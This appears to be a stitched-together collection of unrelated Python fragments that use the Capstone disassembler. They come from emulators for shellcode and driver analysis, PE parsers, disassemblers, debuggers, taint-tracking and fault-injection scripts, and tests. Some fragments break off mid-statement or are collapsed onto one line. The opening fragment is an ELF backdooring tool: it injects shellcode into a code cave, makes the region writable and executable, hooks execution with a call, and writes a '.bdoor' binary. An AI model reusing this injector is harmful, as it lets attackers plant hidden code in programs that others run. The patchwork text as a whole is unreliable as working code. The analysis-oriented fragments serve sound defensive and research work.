        log.warn(f"Program header {log.construct(log.colors.fg.GREEN, ProgramHeaderEnum.Type(elf.program_headers[phid].p_type).name, log.colors.format.RESET)} is finishing before the end of the shellcode.")
        resp = input("Increase its size? [Y/n] ")
        if resp.lower() != 'n':
            prev_size = elf.program_headers[phid].p_filesz
            elf.program_headers[phid].p_filesz = elf.program_headers[phid].p_filesz + len(sc)
            elf.program_headers[phid].p_memsz = elf.program_headers[phid].p_memsz + len(sc)
            log.info(f"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.program_headers[phid].p_filesz), log.colors.format.RESET)} Bytes")
    elif elf.program_headers[phid].p_type != elf.program_headers[end_phid].p_type:
        log.error("Error! The shellcode is overlapping 2 program headers. Find another place.")
        elf.program_headers[phid].print_program_header()
        elf.program_headers[end_phid].print_program_header()
        return

    if not secid:
        print("[x] Error, location is outside of a section.")
        return
    elif not end_secid:
        log.warn(f"Section {log.construct(log.colors.fg.GREEN, elf.section_headers[secid].sh_name_str, log.colors.format.RESET)} is finishing before the end of the shellcode.")
        resp = input("Increase its size? [Y/n] ")
        if resp.lower() != 'n':
            prev_size = elf.section_headers[secid].sh_size
            elf.section_headers[secid].sh_size = elf.section_headers[secid].sh_size + len(sc)
            log.info(f"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.section_headers[secid].sh_size), log.colors.format.RESET)} Bytes")
    elif elf.section_headers[secid].sh_name != elf.section_headers[end_secid].sh_name:
        log.error("Error! The shellcode is overlapping 2 sections. Find another place.")
        elf.section_headers[secid].print_section_header()
        elf.section_headers[end_secid].print_section_header()
        return

    log.info("Setting required program header flags...")
    elf.program_headers[phid].setFlags(ProgramHeaderEnum.Flags.PF_X.value | ProgramHeaderEnum.Flags.PF_W.value | ProgramHeaderEnum.Flags.PF_R.value)
    log.success(f"Program header flags: {log.construct(log.colors.fg.MAGENTA, elf.program_headers[phid].prettyFlags(), log.colors.format.RESET)}")

    log.info("Setting required section flags...")
    elf.section_headers[secid].setFlags(SectionHeaderEnum.Flags.SHF_EXECINSTR.value | SectionHeaderEnum.Flags.SHF_WRITE.value | SectionHeaderEnum.Flags.SHF_ALLOC.value)
    log.success(f"Section flags: {log.construct(log.colors.fg.MAGENTA, elf.section_headers[secid].prettyFlags(), log.colors.format.RESET)}")

    if entry:
        # Relative call (opcode 0xe8) from the hook point to the code cave.
        new_instr = b"\xe8" + elf.p("i", loc-entry)

        import capstone
        md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
        # Collect whole instructions at the hook point until they cover the
        # call that is about to overwrite them.
        i = 0
        legit_instrs = b""
        for (addr, size, mnem, op_str) in md.disasm_lite(bytes(elf.elf_file[entry:entry+0x10]), entry):
            legit_instrs += elf.elf_file[entry+i:entry+size+i]
            i += size
            if i >= len(new_instr):
                break

        # Pad with NOPs so that no partial instruction is left behind.
        new_instr = new_instr + (b"\x90"*(len(legit_instrs)-len(new_instr)))
        elf.elf_file[entry:entry+len(new_instr)] = new_instr
        sc = gen_sc_wrapper(elf.p("I", legit_loc), elf.p("I", loc+5), shellcode, args.breakpoint, elf.ei_class, legit_instrs)
    else:
        elf.e_entry = loc \
            if elf.ei_class == ELFHeaderEnum.Class.ELF64.value \
            else loc + elf.program_headers[phid].p_vaddr

    elf.elf_file[loc:loc+len(sc)] = sc

    newBinData = elf.build_elf()
    newFileName = f"./{args.binary.split('/')[-1]}.bdoor"
    with open(newFileName, "wb") as f:
        f.write(newBinData)
    chmod(newFileName, 0o755)
    log.success(f"Backdoored file written at {log.construct(log.colors.fg.YELLOW, newFileName, log.colors.format.RESET)}!")
    return 0
import unicorn import random import string import capstone import re import globalData import binascii def ranstr(num): salt = ''.join(random.sample(string.ascii_letters + string.digits, num)) return salt cs = capstone.Cs(capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM) cs.detail = True all_regs = None reg_names = { "X0": unicorn.arm64_const.UC_ARM64_REG_X0, "X1": unicorn.arm64_const.UC_ARM64_REG_X1, "X2": unicorn.arm64_const.UC_ARM64_REG_X2, "X3": unicorn.arm64_const.UC_ARM64_REG_X3, "X4": unicorn.arm64_const.UC_ARM64_REG_X4, "X5": unicorn.arm64_const.UC_ARM64_REG_X5, "X6": unicorn.arm64_const.UC_ARM64_REG_X6, "X7": unicorn.arm64_const.UC_ARM64_REG_X7, "X8": unicorn.arm64_const.UC_ARM64_REG_X8, "X9": unicorn.arm64_const.UC_ARM64_REG_X9, "X10": unicorn.arm64_const.UC_ARM64_REG_X10, "X11": unicorn.arm64_const.UC_ARM64_REG_X11, "X12": unicorn.arm64_const.UC_ARM64_REG_X12,
def set_section_info(self):
    """Fill ``self.info['PE']['sections']`` with one dict per PE section.

    Every entry holds the section name, header fields, hashes, entropy,
    executable/writable flags and the file ratio. Executable sections are
    disassembled (base address 0x1000) into ``'asm'`` when the machine type
    is x86 (0x14c) or x86-64 (0x8664) and at least one instruction decodes;
    in every other case the raw bytes are stored as a hex string in
    ``'data'``. Nothing is written when ``self.pe`` has no ``sections``.
    """
    machine = self.info['PE']['FILE_HEADER']['Machine']
    if machine == 0x14c:
        dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32)
    elif machine == 0x8664:
        dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
    else:
        # No disassembler for this machine type; sections are kept as hex.
        dis = None

    if not hasattr(self.pe, 'sections'):
        return

    self.info['PE']['sections'] = []
    for section in self.pe.sections:
        try:
            raw_name = str(section.Name, 'utf-8')
        except UnicodeDecodeError:
            # Not valid UTF-8: ISO-8859-1 can decode any byte sequence.
            raw_name = str(section.Name, 'ISO-8859-1')
        section_name = raw_name.encode(
            'ascii', errors='ignore').strip().decode('ascii').strip(
                ' \t\r\n\0')
        if section_name == '':
            section_name = '.noname'

        section_data = section.get_data()
        section_info = dict()
        section_info['Name'] = section_name
        section_info['Characteristics'] = section.Characteristics
        section_info['VirtualAddress'] = section.VirtualAddress
        section_info['VirtualSize'] = section.Misc_VirtualSize
        section_info['SizeOfRawData'] = section.SizeOfRawData
        section_info['hash'] = {
            'md5': section.get_hash_md5(),
            'sha1': section.get_hash_sha1(),
            'sha256': section.get_hash_sha256()
        }
        section_info['entropy'] = section.get_entropy()
        section_info['executable'] = self.__is_executable(
            section.Characteristics)
        section_info['writable'] = self.__is_writable(
            section.Characteristics)
        section_info['file_ratio'] = self.__get_file_ratio(section_data)

        asm = []
        # Disassemble only when a disassembler exists for this machine.
        if section_info['executable'] and dis is not None:
            asm = [[
                code_line.address,
                ' '.join(
                    format(each_byte, '02x')
                    for each_byte in code_line.bytes),
                '{}'.format(code_line.mnemonic).strip(),
                '{}'.format(code_line.op_str).strip()
            ] for code_line in dis.disasm(section_data, 0x1000)]

        if asm:
            section_info['asm'] = asm
        else:
            section_info['data'] = ' '.join(
                format(each_byte, '02x') for each_byte in section_data)
        self.info['PE']['sections'].append(section_info)
# ScratchABit - interactive disassembler # # Copyright (c) 2018 Paul Sokolovsky # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import capstone import _any_capstone arch_id = "arm_32" dis_arm = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM) dis_thumb = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) def PROCESSOR_ENTRY(): return _any_capstone.Processor("arm_32", dis_arm, dis_thumb)
from qiling.os.windows.structs import *
from contextlib import contextmanager
from karton.core import Karton, Task, Resource

log = logging.getLogger(__name__)

__author__ = "c3rb3ru5"
__version__ = "1.0.0"

memory = []
memory_dumps = []

kernel32 = 'kernel32_dll'
ntdll = 'ntdll_dll'
user32 = 'user32_dll'

# One disassembler per bitness. md32 must use CS_MODE_32; with CS_MODE_64 it
# was just a second copy of md64 and decoded 32-bit code incorrectly.
md32 = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32)
md64 = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)


def raise_timeout(signum, frame):
    """SIGALRM handler: turn the alarm into a ``TimeoutError``."""
    raise TimeoutError


@contextmanager
def timeout(time):
    """Run the ``with`` body under a SIGALRM alarm of ``time`` seconds.

    A ``TimeoutError`` raised inside the body is swallowed, so the body is
    simply abandoned when the alarm fires.
    """
    signal.signal(signal.SIGALRM, raise_timeout)
    signal.alarm(time)
    try:
        yield
    except TimeoutError:
        pass
def load_shellcode(self, path, arch, data=None):
    """
    Load position independent code (i.e. shellcode) to prepare for emulation

    :param path: file to read the shellcode from when ``data`` is empty; it
        is also recorded alongside the mapped buffer
    :param arch: 'x86', 'x64' or 'amd64'; any other value is stored as-is
        and must already be an architecture constant
    :param data: shellcode bytes; takes precedence over ``path``
    :return: address at which the shellcode was mapped
    :raises Win32EmuError: if the architecture is neither x86 nor amd64
    """
    # Translate the textual architecture names into emulator constants.
    if arch == 'x86':
        arch = _arch.ARCH_X86
    elif arch in ('x64', 'amd64'):
        arch = _arch.ARCH_AMD64
    self.arch = arch

    # Take the buffer from memory when given, otherwise from disk.
    if data:
        sc = data
    else:
        with open(path, 'rb') as scpath:
            sc = scpath.read()
    sc_hash = hashlib.sha256(sc).hexdigest()

    if self.arch == _arch.ARCH_X86:
        disasm_mode = cs.CS_MODE_32
    elif self.arch == _arch.ARCH_AMD64:
        disasm_mode = cs.CS_MODE_64
    else:
        raise Win32EmuError('Unsupported architecture: %s' % self.arch)

    self.emu_eng.init_engine(_arch.ARCH_X86, self.arch)
    if not self.disasm_eng:
        self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode)

    # Map the shellcode into memory
    sc_tag = 'emu.shellcode.%s' % (sc_hash)
    sc_size = len(sc)
    sc_addr = self.mem_map(sc_size, tag=sc_tag)
    self.mem_write(sc_addr, sc)
    self.pic_buffers.append((path, sc_addr, sc_size))

    # Architecture name as reported in the input metadata.
    if arch == _arch.ARCH_AMD64:
        sc_arch = 'x64'
    elif arch == _arch.ARCH_X86:
        sc_arch = 'x86'
    else:
        sc_arch = 'unknown'

    if self.profiler:
        self.input = {
            'path': path,
            'sha256': sc_hash,
            'size': sc_size,
            'arch': sc_arch,
            'mem_tag': sc_tag,
            'emu_version': self.get_emu_version(),
            'os_run': self.get_osver_string()
        }
        self.profiler.add_input_metadata(self.input)
        # Strings the initial buffer so that we can detect decoded strings later on
        if self.do_strings:
            self.profiler.strings['ansi'] = self.get_ansi_strings(sc)
            self.profiler.strings['unicode'] = self.get_unicode_strings(sc)

    self.setup()
    return sc_addr
def load_module(self, path=None, data=None):
    """
    Load the kernel module to be emulated

    The module is parsed from `path`, or from the raw bytes in `data` when
    given. In the latter case the module is named after the SHA-256 of the
    bytes and given a '.sys' file name. Raises KernelEmuError when the PE
    targets an unsupported architecture. Returns the loaded PE object.
    """
    pe = self.load_pe(path, data=data, imp_id=w32common.IMPORT_HOOK_ADDR)

    if pe.arch == _arch.ARCH_X86:
        disasm_mode = cs.CS_MODE_32
    elif pe.arch == _arch.ARCH_AMD64:
        disasm_mode = cs.CS_MODE_64
    else:
        # Interpolate the architecture; passing it as a second argument
        # would leave a literal '%s' in the error message.
        raise KernelEmuError('Unsupported architecture: %s' % pe.arch)

    if not self.arch:
        self.arch = pe.arch
        self.set_ptr_size(self.arch)

    self.emu_eng.init_engine(_arch.ARCH_X86, pe.arch)

    if not self.disasm_eng:
        self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode)

    self.api = WindowsApi(self)
    self.om = objman.ObjectManager(emu=self)

    if not data:
        file_name = os.path.basename(path)
        mod_name = os.path.splitext(file_name)[0]
    else:
        # No file name is available for raw bytes: name the module after
        # its SHA-256 digest
        drv_hash = hashlib.sha256()
        drv_hash.update(data)
        mod_name = drv_hash.hexdigest()
        file_name = '%s.sys' % (mod_name)

    emu_path = '%sdrivers\\%s' % (self.get_system_root(), file_name)
    pe.emu_path = emu_path
    self.map_pe(pe, mod_name=mod_name, emu_path=emu_path)
    self.mem_write(pe.base, pe.mapped_image)

    # Strings the initial buffer so that we can detect decoded strings
    # later on
    if self.profiler and self.do_strings:
        astrs = self.get_ansi_strings(pe.mapped_image)
        wstrs = self.get_unicode_strings(pe.mapped_image)

        for s in astrs:
            if s not in self.profiler.strings['ansi']:
                self.profiler.strings['ansi'].append(s)

        for s in wstrs:
            if s not in self.profiler.strings['unicode']:
                self.profiler.strings['unicode'].append(s)

    # Init imported data
    for addr, imp in pe.imports.items():
        mn, fn = imp
        _mod, eh = self.api.get_data_export_handler(mn, fn)
        if eh:
            data_ptr = self.handle_import_data(mn, fn)
            sym = "%s.%s" % (mn, fn)
            self.global_data.update({addr: [sym, data_ptr]})
            self.mem_write(
                addr, data_ptr.to_bytes(self.get_ptr_size(), 'little'))

    # Set the emulator to run in protected mode
    self._setup_gdt(self.get_arch())

    self.setup_kernel_mode()
    self.setup_user_shared_data()

    if not self.stack_base:
        self.stack_base, stack_ptr = self.alloc_stack(pe.stack_commit)

    return pe
def __init__(self, verbose: bool, server_conn: ServerConnection):
    """
    Build the debugger's main screen and run its event loop.

    Creates the source, disassembly, register, stack, input and log panes,
    redirects the logger into the log pane, creates the M68K disassembler
    and then calls MainLoop.run(). `verbose` is not used by this
    constructor; `server_conn` is handed to the command input widget.
    """
    hotkey_commands = {'f5': 'cont', 'f8': 'step', 'f10': 'quit'}

    def _handle_global_input(key: str):
        # Function keys are shortcuts that type a command and press enter
        command = hotkey_commands.get(key)
        if command is None:
            logger.error(f"Function key '{key}' not implemented")
            return
        self._input_view.set_edit_text(command)
        self._input_view.keypress(0, 'enter')

    def _titled_box(heading, view):
        # Line box holding a centered banner heading above the given view
        content = Pile([Text(('banner', heading), align='center'), view])
        filled = Filler(content, valign='top', top=1, bottom=1)
        return LineBox(Padding(filled, left=1, right=1))

    def _plain_box(view):
        # Line box holding just the given view, without a heading
        filled = Filler(view, valign='top')
        return LineBox(Padding(filled, left=1, right=1))

    self._source_view = Text("Source code will be shown here...")
    source_widget = _titled_box("Source code", self._source_view)

    self._disasm_view = Text("Dissambled code will be shown here...")
    disasm_widget = _titled_box("Disassembled code", self._disasm_view)

    self._register_view = Text("Registers will be shown here...")
    register_widget = _titled_box("Registers", self._register_view)

    self._stack_view = Text("Stack will be shown here...")
    stack_widget = _titled_box("Stack", self._stack_view)

    self._input_view = CommandInput(self, server_conn)
    input_widget = _plain_box(self._input_view)

    self._log_view = Text("Log messages will be shown here...")
    log_widget = _plain_box(self._log_view)

    title = AttrMap(
        Text("CWDebug - a source-level debugger for the AmigaOS",
             align='center'),
        'banner')
    menu = AttrMap(
        Text("F5 = Continue, F8 = Single-step over, F10 = Quit"),
        'banner')

    left_column = Pile([source_widget, disasm_widget])
    right_column = Pile([register_widget, stack_widget])
    body = Pile([
        Columns([left_column, right_column]),
        # 2 needs to be added for the line box
        (INPUT_WIDGET_HEIGHT + 2, input_widget),
        (MAX_NUM_OF_LOG_MESSAGES + 2, log_widget),
    ])
    screen = Frame(header=title, body=body, footer=menu)

    # From here on log messages go to the log pane
    logger.remove()
    logger.add(UrwidHandler(self._log_view))
    logger.info("Created main screen, starting event loop")

    self._disassembler = capstone.Cs(capstone.CS_ARCH_M68K,
                                     capstone.CS_MODE_32)

    loop = MainLoop(screen, PALETTE, unhandled_input=_handle_global_input)
    loop.run()
tqdm.write(str((data, exception))) if __name__ == "__main__": if len(sys.argv) != 2 or sys.argv[1] not in [ 'simple', 'snapshot', 'snapshotmulti' ]: print(f'Usage: python3 {sys.argv[0]} [simple|snapshot|snapshotmulti]') sys.exit(1) ARCH = capstone.CS_ARCH_ARM MODE = capstone.CS_MODE_ARM NRUNS = 1000 md = capstone.Cs(ARCH, MODE) addr = 0x102f8 #4#ec#0x102f8 # arguments for fi_model fi_args = {'addr': addr, 'ins': b'\x00' * 4} ql = QilingFi( # Qiling args ["ifelse/ifelse"], ".", console=console, stdin=StringBuffer(), stdout=StringBuffer(), # QilingFi args
# Pick the ELF file to analyse: first command line argument, else '0.elf'
if len(sys.argv) > 1:
    filename = sys.argv[1]
else:
    filename = '0.elf'

# ELF images are binary data, so the file has to be opened in binary mode
elf = ELFFile(open(filename, 'rb'))

# Map every loadable segment at its virtual address
mm = MmapManager()
for seg in elf.iter_segments():
    if seg['p_type'] == 'PT_LOAD':
        mm.memmap(seg['p_vaddr'], seg.data())

entry = elf['e_entry']
da = Disasmer(mm, cs.Cs(cs.CS_ARCH_X86, cs.CS_MODE_64))

# determine main function: scan the entry block for the `mov` instructions
# that load rdi and rcx, and take their last operand as the address
main_addr = None
init_addr = None
start_il = da.disasm_until(entry, BasicBlockEndOrCallCondition())
for i in start_il:
    if i.mnemonic == 'mov' and 'rdi' in i.op_str:
        main_addr = int(i.op_str.split()[-1], 0)
        print('main found')
    if i.mnemonic == 'mov' and 'rcx' in i.op_str:
        init_addr = int(i.op_str.split()[-1], 0)
        print('init found')

# Stop with a clear message instead of a NameError when the entry block
# contains no matching `mov`
if main_addr is None:
    print('cannot find main address')
    sys.exit(1)

# Single-argument print calls give the same output on Python 2 and 3
print('main address %s' % hex(main_addr))
#print_il(da.disasm_until(entry, until_call))
def decode(self, address, code):
    """
    Disassemble `code` as if it were located at `address`.

    Returns a list of (address, length, disassembly text, hex dump) tuples,
    one per decoded instruction. Bytes that cannot be decoded are emitted
    as a "define constant" pseudo instruction ("db" on Intel, "dcb"
    otherwise) so that the whole buffer is always covered.
    """

    # Get the constants for the requested architecture.
    arch, mode = self.__constants[self.arch]

    # Get the decoder function outside the loop.
    md = capstone.Cs(arch, mode)
    decoder = md.disasm_lite

    # If the buggy version of the bindings are being used, we need to catch
    # all exceptions broadly. If not, we only need to catch CsError.
    if self.__bug:
        CsError = Exception
    else:
        CsError = capstone.CsError

    # Loop invariant: is this one of the variable-length Intel targets?
    is_intel = self.arch in (win32.ARCH_I386, win32.ARCH_AMD64)

    # Create the variables for the instruction length, mnemonic and
    # operands. That way they won't be created within the loop,
    # minimizing the chances data might be overwritten.
    # This only makes sense for the buggy version of the bindings, normally
    # memory accesses are safe).
    length = mnemonic = op_str = None

    # For each instruction...
    result = []
    offset = 0
    while offset < len(code):

        # Disassemble a single instruction, because disassembling multiple
        # instructions may cause excessive memory usage (Capstone allocates
        # approximately 1K of metadata per each decoded instruction).
        instr = None
        try:
            instr = list(
                decoder(code[offset:offset + 16], address + offset, 1))[0]
        except IndexError:
            pass  # No instructions decoded.
        except CsError:
            pass  # Any other error.

        # On success add the decoded instruction.
        if instr is not None:

            # Get the instruction length, mnemonic and operands.
            # Copy the values quickly before someone overwrites them,
            # if using the buggy version of the bindings (otherwise it's
            # irrelevant in which order we access the properties).
            length = instr[1]
            mnemonic = instr[2]
            op_str = instr[3]

            # Concatenate the mnemonic and the operands.
            if op_str:
                disasm = "%s %s" % (mnemonic, op_str)
            else:
                disasm = mnemonic

            # Get the instruction bytes as a hexadecimal dump.
            hexdump = HexDump.hexadecimal(code[offset:offset + length])

        # On error add a "define constant" instruction.
        # The exact instruction depends on the architecture.
        else:

            # The number of bytes to skip depends on the architecture.
            # On Intel processors we'll skip one byte, since we can't
            # really know the instruction length. On the rest of the
            # architectures we always know the instruction length.
            skipped = code[offset:offset + (1 if is_intel else 4)]

            # Report the number of bytes really skipped: the buffer may end
            # with fewer than four bytes left.
            length = len(skipped)

            # Get the skipped bytes as a hexadecimal dump.
            hexdump = HexDump.hexadecimal(skipped)

            # Build the "define constant" instruction.
            # On Intel processors it's "db".
            # On ARM processors it's "dcb".
            if is_intel:
                mnemonic = "db "
            else:
                mnemonic = "dcb "

            # Only ASCII letters are shown as characters. chr(b).isalpha()
            # would also accept Latin-1 letters such as 0xE9 and put
            # non-ASCII text into the listing.
            constants = []
            for b in bytearray(skipped):
                if 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A:
                    constants.append("'%s'" % chr(b))
                else:
                    constants.append("0x%x" % b)
            op_str = ", ".join(constants)
            disasm = mnemonic + op_str

        # Add the decoded instruction to the list.
        result.append((
            address + offset,
            length,
            disasm,
            hexdump,
        ))

        # Update the offset.
        offset += length

    # Return the list of decoded instructions.
    return result
'ldr_bm2r0': [0xe5, 0x1f, 0x00, 0x10], 'eor_r0_r1': [0xe0, 0x21, 0x00, 0x00], 'str_bm2r0': [0xe5, 0x0f, 0x00, 0x18], 'b_back': [0xea, 0x00, 0x00, 0x00], } intr_stub = { 'push': [0xe9, 0x2d, 0x00, 0x0e], 'ldr_id2r1': [0xe5, 0x9f, 0x10, 0x08], 'b_bb_stub': [0xea, 0x00, 0x00, 0x00], 'pop': [0xe8, 0xbd, 0x00, 0x0e], 'b_back': [0xea, 0x00, 0x00, 0x00], 'id': [0x00, 0x00, 0x00, 0x00] } md = caps.Cs(caps.CS_ARCH_ARM, caps.CS_MODE_ARM) prog = None with open(sys.argv[1], 'rb') as fd: prog = bytearray(fd.read()) print("bm_addr: %x" % bm_addr) prog.extend(set_bb_stub['bm0'][::-1]) prog.extend(set_bb_stub['bm1'][::-1]) prog.extend(set_bb_stub[''][::-1]) prog.extend([0] * 4) last_addr = len(prog) + 1 bbdict = pickle.load(open(sys.argv[2], 'rb'))
def __init__(self, filename, raw_type, raw_base, raw_big_endian, database):
    """
    Load the binary and set up the Capstone disassembler for it.

    The memory model, comments, functions, xrefs and (when the database is
    already loaded) the symbol tables are taken from `database`; otherwise
    the symbols are loaded from the binary and stored into the database.
    Raises ExcArch when the binary's architecture is not one of x86, x64,
    ARM, MIPS32 or MIPS64.
    """
    import capstone as CAPSTONE

    arch_lookup = {
        "x86": CAPSTONE.CS_ARCH_X86,
        "x64": CAPSTONE.CS_ARCH_X86,
        "ARM": CAPSTONE.CS_ARCH_ARM,
        "MIPS32": CAPSTONE.CS_ARCH_MIPS,
        "MIPS64": CAPSTONE.CS_ARCH_MIPS,
    }

    mode_lookup = {
        "x86": CAPSTONE.CS_MODE_32,
        "x64": CAPSTONE.CS_MODE_64,
        # This table holds modes, so use the ARM *mode* constant rather
        # than the architecture constant.
        "ARM": CAPSTONE.CS_MODE_ARM,
        "MIPS32": CAPSTONE.CS_MODE_MIPS32,
        "MIPS64": CAPSTONE.CS_MODE_MIPS64,
    }

    word_size_lookup = {
        "x86": 4,
        "x64": 8,
        "ARM": 4,
        "MIPS32": 4,
        "MIPS64": 8,
    }

    self.capstone_inst = {}  # capstone instruction cache
    self.db = database

    # Reuse the memory model of a loaded database, else create a new one
    # and register it in the database
    if database.loaded:
        self.mem = database.mem
    else:
        self.mem = Memory()
        database.mem = self.mem

    self.instanciate_binary(filename, raw_type, raw_base, raw_big_endian)

    binary_arch = self.binary.arch
    if binary_arch not in arch_lookup:
        raise ExcArch(binary_arch)

    self.wordsize = word_size_lookup[binary_arch]
    self.binary.wordsize = self.wordsize

    self.is_mips = binary_arch in ("MIPS32", "MIPS64")
    self.is_x86 = binary_arch in ("x86", "x64")
    # Plain equality: `in ("ARM")` is a substring test on the string "ARM"
    self.is_arm = binary_arch == "ARM"
    self.is_big_endian = self.binary.is_big_endian()

    self.binary.load_section_names()

    self.jmptables = database.jmptables
    self.user_inline_comments = database.user_inline_comments
    self.internal_inline_comments = database.internal_inline_comments
    self.user_previous_comments = database.user_previous_comments
    self.internal_previous_comments = database.internal_previous_comments
    self.functions = database.functions
    self.func_id = database.func_id
    self.end_functions = database.end_functions

    self.xrefs = database.xrefs
    self.mem.xrefs = database.xrefs
    self.mem.data_sub_xrefs = database.data_sub_xrefs

    self.mips_gp = database.mips_gp

    if not database.loaded:
        # First load: read the symbols from the binary and save them
        self.load_symbols()
        database.symbols = self.binary.symbols
        database.reverse_symbols = self.binary.reverse_symbols
        database.demangled = self.binary.demangled
        database.reverse_demangled = self.binary.reverse_demangled
        database.imports = self.binary.imports
    else:
        # Symbols were saved before: restore them from the database
        self.binary.symbols = database.symbols
        self.binary.reverse_symbols = database.reverse_symbols
        self.binary.demangled = database.demangled
        self.binary.reverse_demangled = database.reverse_demangled
        self.binary.imports = database.imports

    cs_arch = arch_lookup[binary_arch]
    cs_mode = mode_lookup[binary_arch]

    if self.is_big_endian:
        cs_mode |= CAPSTONE.CS_MODE_BIG_ENDIAN
    else:
        cs_mode |= CAPSTONE.CS_MODE_LITTLE_ENDIAN

    self.capstone = CAPSTONE
    self.md = CAPSTONE.Cs(cs_arch, cs_mode)
    self.md.detail = True

    for s in self.binary.iter_sections():
        s.big_endian = cs_mode & CAPSTONE.CS_MODE_BIG_ENDIAN
# Capstone is optional: without it the tests in this module are skipped
try:
    import capstone
except ImportError:
    capstone = None

import pytest

import windows.native_exec.simple_x64 as x64
from windows.native_exec.simple_x64 import *
del Test # Prevent pytest warning
from windows.pycompat import int_types

if capstone:
    disassembleur = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
    disassembleur.detail = True


@pytest.fixture
def need_capstone():
    """Skip the requesting test when capstone could not be imported."""
    if capstone is None:
        # pytest.skip() raises by itself
        pytest.skip("Capstone is not installed")
    return True


# Every test of this module depends on capstone
pytestmark = pytest.mark.usefixtures("need_capstone")


def disas(x):
    """Disassemble the bytes `x` at address 0 and return the instructions."""
    instructions = disassembleur.disasm(x, 0)
    return [insn for insn in instructions]


# Mnemonics reported under another name than the expected one
mnemonic_name_exception = {'movabs': 'mov'}
def __init__(self, arch_str, bytestring):
    """Initialize wrapper over Capstone CsInsn or Cs.

    arch_str (str)   - the architecture of the instruction (accepted:
                       X86, AMD64, ARM64)
    bytestring (str) - the hex string corresponding to the instruction
                       bytes

    Raises UnsupportedArchException for any other `arch_str` and
    ParseInsnException when the bytes cannot be disassembled.
    """
    # Local import so this block does not depend on the file's import list
    import binascii

    self.archstring = arch_str
    if arch_str == 'X86':
        self.arch = isa.x86.X86()
    elif arch_str == 'AMD64':
        self.arch = isa.amd64.AMD64()
    elif arch_str == 'ARM64':
        self.arch = isa.arm64.ARM64()
    else:
        raise UnsupportedArchException()

    self.bytestring = bytestring
    # unhexlify works on both Python 2 and 3, unlike str.decode('hex')
    self.bytecode = binascii.unhexlify(bytestring)

    cs = capstone.Cs(self.arch.cs_arch[0], self.arch.cs_arch[1])
    cs.detail = True

    try:
        cs_insn_info = next(cs.disasm(self.bytecode, 0x1000))
    except Exception:
        # Includes StopIteration, raised when nothing could be decoded.
        # Not a bare `except`, so KeyboardInterrupt/SystemExit pass through.
        traceback.print_exc()
        raise ParseInsnException()

    self.asm_str = "{}\t{}".format(cs_insn_info.mnemonic,
                                   cs_insn_info.op_str)
    print('Disassembling instruction: {}'.format(self.asm_str))

    # REGISTERS
    # get register set based on capstone
    # based on cs, regs_access includes all explicit & implicit registers
    regs_read, regs_write = cs_insn_info.regs_access()
    accessed = [
        self.arch.create_full_reg(cs_insn_info.reg_name(reg))
        for reg in list(regs_read) + list(regs_write)
    ]

    # capstone register set
    # FPSW is left out because unicorn can't write to it. A new list is
    # built because removing entries while iterating the same list skips
    # the element after each removal, which could leave an FPSW behind.
    self.cs_reg_set = [reg for reg in accessed if reg.name != 'FPSW']

    # register set based on manually defined information in
    # arm64/x86_constaints.py
    # NOTE: the code that filled this set, and the one that added memory
    # operand pseudo registers (MEM_READn / MEM_WRITE1) to cs_reg_set, was
    # commented out, so this set is always empty here.
    self.manual_reg_set = []

    reg_set = sorted(set(self.cs_reg_set + self.manual_reg_set))

    self.insninfo = InsnInfo(arch_str, bytestring, reg_set,
                             self.arch.cond_reg)
10) # Taint R2 with label 10. Should prop into R1 @panda.cb_insn_translate def should_run_on_insn(env, pc): ''' At each basic block, decide if we run on_insn for each contained instruction. For now, always return True unless we're past stop_addr Alternatively could be implemented as panda.cb_insn_translate(lambda x,y: True) ''' return True md = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM) @panda.cb_insn_exec def on_insn(cpu, pc): ''' At each instruction, print capstone disassembly. When we reach stop_addr, dump registers and shutdown ''' if pc == stop_addr: print("Finished execution. CPU registers are:") panda.arch.dump_regs(cpu) print("Taint results\n") if panda.taint_check_reg(panda.arch.registers['R1']): for idx, byte_taint in enumerate(
print("Machine state initialized") @panda.cb_insn_translate def should_run_on_insn(env, pc): ''' At each basic block, decide if we run on_insn for each contained instruction. For now, always return True unless we're past stop_addr Alternatively could be implemented as panda.cb_insn_translate(lambda x,y: True) ''' return True md = capstone.Cs(capstone.CS_ARCH_PPC, capstone.CS_MODE_32) @panda.cb_insn_exec def on_insn(cpu, pc): ''' At each instruction, print capstone disassembly. When we reach stop_addr, dump registers and shutdown ''' print("Insn!") if pc == stop_addr: print("Finished execution. CPU registers are:") d() ''' dump_regs(panda, cpu)